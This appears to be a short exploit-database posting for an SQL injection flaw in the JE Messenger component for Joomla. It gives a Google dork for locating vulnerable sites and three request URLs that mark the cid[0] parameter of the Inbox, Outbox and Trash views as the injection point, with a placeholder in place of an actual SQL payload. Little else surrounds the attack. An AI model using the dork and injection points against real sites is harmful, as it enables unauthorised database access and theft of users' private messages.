# # # # # # Exploit Title: Joomla! Component JE Messanger - SQL Injection # Google Dork: inurl:index.php?option=com_jemessenger # Date: 13.02.2017 # Vendor Homepage: http://www.joomlaextension.biz/ # Software Buy: http://www.joomlaextension.biz/demo/index.php?option=com_jemessenger # Demo: http://www.joomlaextension.biz/demo/ # Version: N/A # Tested on: Win7 x64, Kali Linux x64 # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Mail : ihsan[@]ihsan[.]net # # # # # # SQL Injection/Exploit : # http://localhost/[PATH]/index.php?option=com_jemessenger&view=box_detail&folder=Inbox&task=edit&Itemid=1496&cid[0]=[SQL] # http://localhost/[PATH]/index.php?option=com_jemessenger&view=box_detail&folder=Outbox&task=edit&Itemid=1496&cid[0]=[SQL] # http://localhost/[PATH]/index.php?option=com_jemessenger&view=box_detail&folder=Trash&task=edit&Itemid=1496&cid[0]=[SQL] # # # # # # Iranian Exploit DataBase = http://IeDb.Ir [2017-02-17]